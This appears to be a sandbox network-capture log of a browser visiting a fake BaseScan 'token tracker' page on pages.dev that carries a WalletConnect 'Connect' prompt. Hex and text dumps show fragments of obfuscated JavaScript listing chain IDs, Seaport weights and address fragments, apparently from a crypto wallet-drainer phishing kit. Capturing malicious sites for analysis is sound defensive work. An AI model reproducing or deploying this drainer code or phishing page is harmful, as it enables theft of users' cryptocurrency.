                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 35 39 66 38 34 63 3d 5f 30 78 32 31 36 61 36 66 3b 6c 65 74 20 5f 30 78 31 61 30 66 63 65 3b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 32 65 36 30 64 63 3d 46 75 6e 63 74 69 6f 6e 28 5f 30 78 35 39 66 38 34 63 5b 27 4f 41 46 67 54 27 5d 28 5f 30 78 35 39 66 38 34 63 5b 5f 30 78 39 62 38 64 32 32 28 30 78 31 62 66 35 2c 30 78 31 35 32 31 2c 30 78 31 33 31 35 2c 30 78 31 33 32 65 29 5d 28 5f 30 78 35 39 66 38 34 63 5b 5f 30 78 39 62 38 64 32 32 28 30 78 61 64 33 2c 30 78 62 34 39 2c 2d 30 78 65 65 2c 30 78 39 31 38 29 5d 2c 5f 30 78 35 39 66 38 34 63 5b 5f 30 78 37 30 62 34 62 64 28 30 78 31 31 39 32 2c 30 78 31 62 34 39 2c 30 78 36 66 64 2c 30 78 31 33 32 37 29 5d 29 2c 27 29 3b 27 29 29 3b 5f 30 78 31 61 30 66 63 65 3d 5f 30 78 32 65 36 30 64 63 28 29 3b 7d
                                                                                                                                                                                                                                              Data Ascii: 59f84c=_0x216a6f;let _0x1a0fce;try{const _0x2e60dc=Function(_0x59f84c['OAFgT'](_0x59f84c[_0x9b8d22(0x1bf5,0x1521,0x1315,0x132e)](_0x59f84c[_0x9b8d22(0xad3,0xb49,-0xee,0x918)],_0x59f84c[_0x70b4bd(0x1192,0x1b49,0x6fd,0x1327)]),');'));_0x1a0fce=_0x2e60dc();}
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 61 63 63 30 32 3b 7d 7d 29 3b 5f 30 78 35 34 64 36 36 65 28 29 3b 63 6f 6e 73 74 20 5f 30 78 33 31 37 64 32 35 3d 7b 7d 3b 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 32 37 32 33 33 32 28 30 78 64 63 62 2c 30 78 31 33 66 30 2c 30 78 61 36 37 2c 30 78 36 35 63 29 5d 3d 30 78 32 2c 5f 30 78 33 31 37 64 32 35 5b 27 73 65 61 70 6f 72 74 27 5d 3d 31 2e 34 2c 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 61 61 37 34 36 61 28 30 78 31 30 33 63 2c 30 78 31 31 37 36 2c 30 78 31 39 34 39 2c 30 78 31 34 35 66 29 2b 27 73 27 5d 3d 32 2e 32 2c 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 61 61 37 34 36 61 28 30 78 39 64 64 2c 30 78 64 38 61 2c 30 78 31 34 63 30 2c 30 78 66 35 36 29 5d 3d 31 2e 35 2c 5f 30 78 33 31 37 64 32 35 5b 5f 30 78 61 61 37 34 36 61 28 30 78 32 30 34 36 2c 30 78
                                                                                                                                                                                                                                              Data Ascii: acc02;}});_0x54d66e();const _0x317d25={};_0x317d25[_0x272332(0xdcb,0x13f0,0xa67,0x65c)]=0x2,_0x317d25['seaport']=1.4,_0x317d25[_0xaa746a(0x103c,0x1176,0x1949,0x145f)+'s']=2.2,_0x317d25[_0xaa746a(0x9dd,0xd8a,0x14c0,0xf56)]=1.5,_0x317d25[_0xaa746a(0x2046,0x
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 37 32 33 33 32 28 30 78 31 34 64 33 2c 30 78 39 62 30 2c 30 78 31 30 36 39 2c 30 78 31 37 37 36 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 35 66 2c 30 78 35 63 64 2c 30 78 31 34 63 2c 30 78 37 63 36 29 5d 3d 30 78 35 2c 5f 30 78 32 64 32 66 30 34 5b 5f 30 78 61 61 37 34 36 61 28 30 78 64 66 63 2c 30 78 36 31 61 2c 30 78 31 30 33 62 2c 30 78 37 65 61 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 31 63 31 33 2c 30 78 31 61 31 63 2c 30 78 31 63 37 32 2c 30 78 31 66 62 61 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 31 39 38 31 2c 30 78 31 39 32 35 2c 30 78 31 65 66 66 2c 30 78 31 39 30 37 29 5d 3d 21 21 5b 5d 2c 5f 30 78 32 64 32 66 30 34 5b 5f 30 78 32 37 32 33 33 32 28 30 78 65 37 63 2c 30 78 31 62 36 30 2c 30 78 31 37 38 34 2c 30 78 31 37 32 33 29 2b 5f 30 78 32
                                                                                                                                                                                                                                              Data Ascii: 72332(0x14d3,0x9b0,0x1069,0x1776)+_0xaa746a(0x5f,0x5cd,0x14c,0x7c6)]=0x5,_0x2d2f04[_0xaa746a(0xdfc,0x61a,0x103b,0x7ea)+_0xaa746a(0x1c13,0x1a1c,0x1c72,0x1fba)+_0xaa746a(0x1981,0x1925,0x1eff,0x1907)]=!![],_0x2d2f04[_0x272332(0xe7c,0x1b60,0x1784,0x1723)+_0x2
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 30 78 66 34 29 2b 27 31 32 46 30 35 32 65 63 42 33 27 2b 5f 30 78 61 61 37 34 36 61 28 30 78 31 64 62 63 2c 30 78 31 35 34 61 2c 30 78 31 65 63 31 2c 30 78 31 64 37 65 29 2b 27 39 35 27 2c 5f 30 78 61 61 37 34 36 61 28 30 78 31 62 31 34 2c 30 78 31 35 61 33 2c 30 78 31 37 32 31 2c 30 78 31 61 30 30 29 2b 5f 30 78 61 61 37 34 36 61 28 30 78 35 37 62 2c 30 78 66 37 65 2c 30 78 39 61 62 2c 30 78 31 38 35 39 29 2b 27 66 66 36 32 63 30 61 30 32 62 27 2b 5f 30 78 61 61 37 34 36 61 28 30 78 36 32 31 2c 30 78 35 64 61 2c 2d 30 78 33 30 36 2c 30 78 39 32 66 29 2b 27 36 37 27 2c 5f 30 78 61 61 37 34 36 61 28 30 78 33 38 32 2c 30 78 61 30 31 2c 2d 30 78 32 66 2c 30 78 38 61 30 29 2b 5f 30 78 32 37 32 33 33 32 28 30 78 32 65 64 2c 30 78 32 64 37 2c 30 78 39 64 66 2c
                                                                                                                                                                                                                                              Data Ascii: 0xf4)+'12F052ecB3'+_0xaa746a(0x1dbc,0x154a,0x1ec1,0x1d7e)+'95',_0xaa746a(0x1b14,0x15a3,0x1721,0x1a00)+_0xaa746a(0x57b,0xf7e,0x9ab,0x1859)+'ff62c0a02b'+_0xaa746a(0x621,0x5da,-0x306,0x92f)+'67',_0xaa746a(0x382,0xa01,-0x2f,0x8a0)+_0x272332(0x2ed,0x2d7,0x9df,
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 31 63 64 37 62 34 5b 5f 30 78 32 37 32 33 33 32 28 30 78 31 61 61 36 2c 30 78 31 34 34 64 2c 30 78 31 30 37 32 2c 30 78 31 39 35 31 29 5d 3d 30 78 31 2c 5f 30 78 31 63 64 37 62 34 5b 5f 30 78 61 61 37 34 36 61 28 30 78 31 33 31 37 2c 30 78 61 34 34 2c 30 78 63 38 66 2c 30 78 31 33 64 30 29 5d 3d 30 78 33 38 2c 5f 30 78 31 63 64 37 62 34 5b 27 78 64 61 69 27 5d 3d 30 78 36 34 2c 5f 30 78 31 63 64 37 62 34 5b 5f 30 78 32 37 32 33 33 32 28 30 78 64 37 63 2c 30 78 66 64 36 2c 30 78 31 34 64 37 2c 30 78 31 30 38 64 29 5d 3d 30 78 61 34 62 31 2c 5f 30 78 31 63 64 37 62 34 5b 27 6d 61 74 69 63 27 5d 3d 30 78 38 39 2c 5f 30 78 31 63 64 37 62 34 5b 27 61 76 61 78 27 5d 3d 30 78 61 38 36 61 2c 5f 30 78 31 63 64 37 62 34 5b 27 6f 70 27 5d 3d 30 78 61 2c 5f 30 78 31
                                                                                                                                                                                                                                              Data Ascii: 1cd7b4[_0x272332(0x1aa6,0x144d,0x1072,0x1951)]=0x1,_0x1cd7b4[_0xaa746a(0x1317,0xa44,0xc8f,0x13d0)]=0x38,_0x1cd7b4['xdai']=0x64,_0x1cd7b4[_0x272332(0xd7c,0xfd6,0x14d7,0x108d)]=0xa4b1,_0x1cd7b4['matic']=0x89,_0x1cd7b4['avax']=0xa86a,_0x1cd7b4['op']=0xa,_0x1


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              17192.168.2.549739172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:15:59 UTC694OUTGET /loaderImage.gif HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC811INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:00 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b4e0iWxuYMFar6T1DVxuWQ9Ar1R6ldJDQ2YKP9keDYTAKkpr028VyfAz0s%2B9TxR%2FJKEt%2BpHCTAlBMN7TWV8ukJn9%2F2feTxEqKDBS7TZ%2BeHJ%2BNKNsgjfaD2adi%2F9qcH%2FjN1w%2BL0nWgEj%2BncG52EuBCtmIM9aWI9uxPYdxziFb%2FoA7q7bdKsP0a5rXArctWI2UVYEOwAl%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2b3cc36434b-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC558INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30
                                                                                                                                                                                                                                              Data Ascii: 2000<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <link rel="shortcut icon" href="favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="theme-color" content="#0000
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 72 65 66 3d 22 73 74 79 6c 65 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 38 34 30 30 31 33 66 64 38 63 32 61 62 32 33 34 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 33 2e 31 2e 32 2f 72 6f 6c 6c 75 70 73 2f 61 65 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63
                                                                                                                                                                                                                                              Data Ascii: ref="style.css" /> <link rel="stylesheet" href="840013fd8c2ab234.css" /> <link rel="stylesheet" href="styles.css" /> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script> <script src="https://c
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 26 23 33 39 3b 25 33 45 20 25 33 43 21 2d 2d 20 47 65 6e 65 72 61 74 6f 72 3a 20 53 6b 65 74 63 68 20 34 39 2e 33 20 28 35 31 31 36 37 29 20 2d 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 68 65 6d 69 61 6e 63 6f 64 69 6e 67 2e 63 6f 6d 2f 73 6b 65 74 63 68 20 2d 2d 25 33 45 20 25 33 43 74 69 74 6c 65 25 33 45 57 61 6c 6c 65 74 43 6f 6e 6e 65 63 74 25 33 43 2f 74 69 74 6c 65 25 33 45 20 25 33 43 64 65 73 63 25 33 45 43 72 65 61 74 65 64 20 77 69 74 68 20 53 6b 65 74 63 68 2e 25 33 43 2f 64 65 73 63 25 33 45 20 25 33 43 64 65 66 73 25 33 45 25 33 43 2f 64 65 66 73 25 33 45 20 25 33 43 67 20 69 64 3d 26 23 33 39 3b 50 61 67 65 2d 31 26 23 33 39 3b 20 73 74 72 6f 6b 65 3d 26 23 33 39 3b
                                                                                                                                                                                                                                              Data Ascii: p://www.w3.org/1999/xlink&#39;%3E %3C!-- Generator: Sketch 49.3 (51167) - http://www.bohemiancoding.com/sketch --%3E %3Ctitle%3EWalletConnect%3C/title%3E %3Cdesc%3ECreated with Sketch.%3C/desc%3E %3Cdefs%3E%3C/defs%3E %3Cg id=&#39;Page-1&#39; stroke=&#39;
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 43 31 34 38 2e 38 39 33 35 31 37 2c 31 32 36 2e 32 31 34 33 38 39 20 31 34 38 2e 38 39 33 35 31 34 2c 31 32 36 2e 32 31 34 33 39 33 20 31 34 38 2e 38 39 33 35 31 2c 31 32 36 2e 32 31 34 33 39 36 20 4c 39 31 2e 35 34 30 35 38 38 38 2c 31 38 32 2e 33 36 38 39 32 37 20 43 38 39 2e 30 39 35 30 35 32 2c 31 38 34 2e 37 36 33 33 35 39 20 38 35 2e 31 33 30 30 31 33 33 2c 31 38 34 2e 37 36 33 33 39 39 20 38 32 2e 36 38 34 34 32 37 36 2c 31 38 32 2e 33 36 39 30 31 34 20 43 38 32 2e 36 38 34 34 31 33 33 2c 31 38 32 2e 33 36 39 20 38 32 2e 36 38 34 33 39 38 2c 31 38 32 2e 33 36 38 39 38 36 20 38 32 2e 36 38 34 33 38 32 37 2c 31 38 32 2e 33 36 38 39 37 20 4c 31 2e 38 37 31 39 36 33 32 37 2c 31 30 33 2e 32 34 36 37 38 35 20 43 2d 30 2e 35 37 33 35 39 36 39 33 39 2c 31
                                                                                                                                                                                                                                              Data Ascii: C148.893517,126.214389 148.893514,126.214393 148.89351,126.214396 L91.5405888,182.368927 C89.095052,184.763359 85.1300133,184.763399 82.6844276,182.369014 C82.6844133,182.369 82.684398,182.368986 82.6843827,182.36897 L1.87196327,103.246785 C-0.573596939,1
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC1369INData Raw: 74 6f 6e 20 63 6c 61 73 73 3d 22 69 6e 74 65 72 61 63 74 2d 6e 6f 77 22 3e 43 6f 6e 6e 65 63 74 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 59 4e 43 20 53 45 43 54 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 73 79 6e 63 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 73 63 2d 6a 53 46 6a 64 6a 20 66 6b 6f 57 4a 53 20 73 63 2d 69 77 61 6a 70 6d 20 6b 79 64 52 48 63 20 6d 74 2d 31 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73
                                                                                                                                                                                                                                              Data Ascii: ton class="interact-now">Connect</button> </div> </div> </div> ... SYNC SECT --> <div id="sync" class="sc-jSFjdj fkoWJS sc-iwajpm kydRHc mt-10" style="dis


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              18192.168.2.54974235.190.80.14435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC664OUTOPTIONS /report/v4?s=deHEn%2BV5q%2BOj8m%2FK%2Bs9P63e5aM%2BWZt7kb7%2BnUsOgU8qySCQj83V12WHgo%2FEaRv8%2BC7QaS5ObT53dnlYIFS3TxKvJc3c25tRY3WpYYjpE0c7Zgkq5Oz3lpghTVTDRMvZr4jJgw3MCYsDNTFtdUTgHzRvYEOaDfGVdAjK5KqJVuf5oviWaYkR0mQJ3oWsLyPPUzUXohvQq HTTP/1.1
                                                                                                                                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Origin: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Access-Control-Request-Method: POST
                                                                                                                                                                                                                                              Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              access-control-max-age: 86400
                                                                                                                                                                                                                                              access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                                                                                                              access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                              date: Sat, 28 Sep 2024 01:16:00 GMT
                                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                              Connection: close


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              19192.168.2.549744172.66.47.854435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:00 UTC794OUTGET /dist/website HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC801INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:01 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                              referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fmaBd90GE0yNmUQp87GpoSBBOvpPScAwo%2B3RYbj%2BP%2BNh18vkC%2FtOPp6vWeurI%2FO1B0%2BKiLue%2Bsh6roBzAdbVkxGlt8hRUIXvCdmAhC8ONQ0A3OC1gplKQPaz0py8LPJ55mOVRCL2we2v9ADTIVlbobM1I9YOtx85XQXue6dOTSK8BWSXhBfDwyw7IT0UgA8DR4bHy7RJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2ba7a8e0cd9-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC568INData Raw: 35 66 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 0d 0a 20 20 20 50 45 50 69 20 28 50 45 50 49 29 20 54 6f 6b 65 6e 20 54 72 61 63 6b 65 72 20 7c 20 42 61 73 65 0d 0a 20 20 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 62 61 73 65 73 63 61 6e 2e 6f
                                                                                                                                                                                                                                              Data Ascii: 5fe3<!DOCTYPE html><html lang="en"> <head> <title> PEPi (PEPI) Token Tracker | Base </title> <meta charset="utf-8"/> <meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport"/> <meta content="basescan.o
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 2f 3e 0d 0a 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 42 61 73 65 53 63 61 6e 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 2f 3e 0d 0a 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 45 50 69 20 28 50 45 50 49 29 20 54 6f 6b 65 6e 20 54 72 61 63 6b 65 72 20 6f 6e 20 42 61 73 65 20 73 68 6f 77 73 20 74 68 65 20 70 72 69 63 65 20 6f 66 20 74 68 65 20 54 6f 6b 65 6e 20 24 30 2e 30 30 30 30 2c 20 74 6f 74 61 6c 20 73 75 70 70 6c 79 20 31 33 2c 33 37 30 2c 20 6e 75 6d 62 65 72 20 6f 66 20 68 6f 6c 64 65 72 73 20 38 34 36 20 61 6e 64 20 75 70 64 61 74 65 64 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 74 6f 6b 65 6e 2e 20 54 68 65 20 74 6f
                                                                                                                                                                                                                                              Data Ascii: property="og:image"/> <meta content="BaseScan" property="og:site_name"/> <meta content="PEPi (PEPI) Token Tracker on Base shows the price of the Token $0.0000, total supply 13,370, number of holders 846 and updated information of the token. The to
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 20 20 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 27 47 2d 54 57 45 4c 38 47 52 51 31 32 27 2c 20 7b 20 27 61 6e 6f 6e 79 6d 69 7a 65 5f 69 70 27 3a 20 74 72 75 65 20 7d 29 3b 0d 0a 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 2f 2f 53 65 61 72 63 68 20 62 6f 78 20 74 65 78 74 20 61 64 0d 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 61 76 61 69 6c 61 62 6c 65 41 64 20 3d 20 5b 5d 3b 0d 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 67 6f 74 41 64 20 3d 20 5b 5d 3b 0d 0d 0a 0d 0d 0a 20 20 20 20 20 20 20 20 0d 0d 0a 20 20 20 20 20 20 20 20 61 76 61 69 6c 61 62 6c 65 41 64 20 3d 20 5b 5d 3b 0d 0d 0a 20 20 20 20 20 20 20 20 67 6f 74 41 64 20 3d 20 5b 20 22 53 68 6f 77 41 64 73 09 09 09 09 09 22 20 5d 3b 0d 0a
                                                                                                                                                                                                                                              Data Ascii: gtag('config','G-TWEL8GRQ12', { 'anonymize_ip': true }); </script> <script> //Search box text ad var availableAd = []; var gotAd = []; availableAd = []; gotAd = [ "ShowAds" ];
                                                                                                                                                                                                                                              2024-09-28 01:16:01 UTC1369INData Raw: 20 20 20 20 74 6f 70 3a 20 30 3b 0d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 64 65 66 61 75 6c 74 0d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0d 0a 20 20 20 20 20 20 20 20 2e 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 20 7b 0d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 65 37 65 61 66 33 3b 0d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 38 66 61 66 64 3b 0d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2e 64 61 72 6b 2d 6d 6f 64 65 20 2e 75 69 2d 73 74 61 74 65 2d 61 63 74 69 76 65 20 7b 0d 0d 0a 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e
